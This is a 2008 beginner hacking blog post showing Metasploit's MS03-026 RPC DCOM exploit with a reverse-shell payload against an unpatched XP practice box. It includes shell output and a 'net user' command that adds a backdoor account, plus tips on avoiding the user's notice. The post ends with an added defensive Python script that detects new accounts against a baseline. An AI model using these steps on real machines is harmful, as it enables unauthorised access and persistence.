Tuesday, May 13, 2008

MetaSploit

A good way to learn how to start hacking is to set up a practice box. I usually just set up a fresh install of XP with no updates. This makes life easy because you progress in stages: you start with an open box and try to hack it, patch it and try to hack it again, secure it and try to hack it again, and so on, so you learn how to grow from the bottom up. Believe it: it is 2008 and there are still some people who do not run SP2, which will shield you from my following example.

Metasploit is a great program for n00bs: you can see the Framework, so you know how it works, and you can monitor your network or the hack box so you can see exactly what it is doing. For this example I'll be using the Metasploit web interface, which I never used a couple of years ago. You launch the interface and browse over to http://127.0.0.1:55555. I will be using the exploit Microsoft RPC DCOM MS03-026. Once you select it you will be prompted with payloads; I always choose win32_reverse, which will give you a command prompt on that computer. My advice would be not to use VNC, since it will lock the user out of their computer and they will notice something is up. I like to make my own user account, so if I'm ever actually at the computer I have a username and password. When you deliver the payload you will get this:
[*] Starting Reverse Handler.
[*] Sending request...
[*] Got connection from 10.10.10.197:4321 <-> 10.10.10.134:2255
[*] Shell started on session 1
When you click on session 1 you will get the shell.
We are going to add a user named metasploit.
C:\WINDOWS\system32>
>> net user metasploit /add
net user metasploit /add
The command completed successfully.
C:\WINDOWS\system32>
You can choose to change the user's password, change the admin password, etc. Have fun with it.
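
To see what the session above leaves behind when you monitor the practice box, compare its account list against a baseline taken right after the fresh install. This is an added example, not part of the original post: the host name, the baseline accounts and the 25-character column width of `net user` output are assumptions, and the sample output is constructed.

```python
"""Compare `net user` output from a practice box against a known-good baseline."""

COLUMN_WIDTH = 25  # assumption: `net user` prints names in fixed 25-character columns

# Constructed sample: `net user` output captured after the session shown above.
SAMPLE_AFTER = r"""
User accounts for \\PRACTICE-XP

-------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant
lab user                 metasploit               SUPPORT_388945a0
The command completed successfully.
"""

# Constructed baseline: accounts recorded right after the fresh install.
BASELINE = {"Administrator", "Guest", "HelpAssistant", "lab user", "SUPPORT_388945a0"}


def parse_net_user(output):
    """Return the set of account names listed in `net user` output."""
    names = set()
    in_table = False
    for line in output.splitlines():
        if line.startswith("---"):
            in_table = True  # account names start after the dashed rule
            continue
        if not in_table or not line.strip():
            continue
        if line.startswith("The command completed"):
            break
        # Slice by column instead of splitting on whitespace: names may contain spaces.
        for start in range(0, len(line), COLUMN_WIDTH):
            name = line[start:start + COLUMN_WIDTH].strip()
            if name:
                names.add(name)
    return names


def account_drift(baseline, current):
    """Return (added, removed) account names, compared case-insensitively."""
    base = {n.lower(): n for n in baseline}
    cur = {n.lower(): n for n in current}
    added = sorted(cur[k] for k in cur.keys() - base.keys())
    removed = sorted(base[k] for k in base.keys() - cur.keys())
    return added, removed


if __name__ == "__main__":
    added, removed = account_drift(BASELINE, parse_net_user(SAMPLE_AFTER))
    print("new accounts:", added)
    print("missing accounts:", removed)
```

Record the baseline before each round of patch-and-retest so that any account added during a session shows up as drift.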
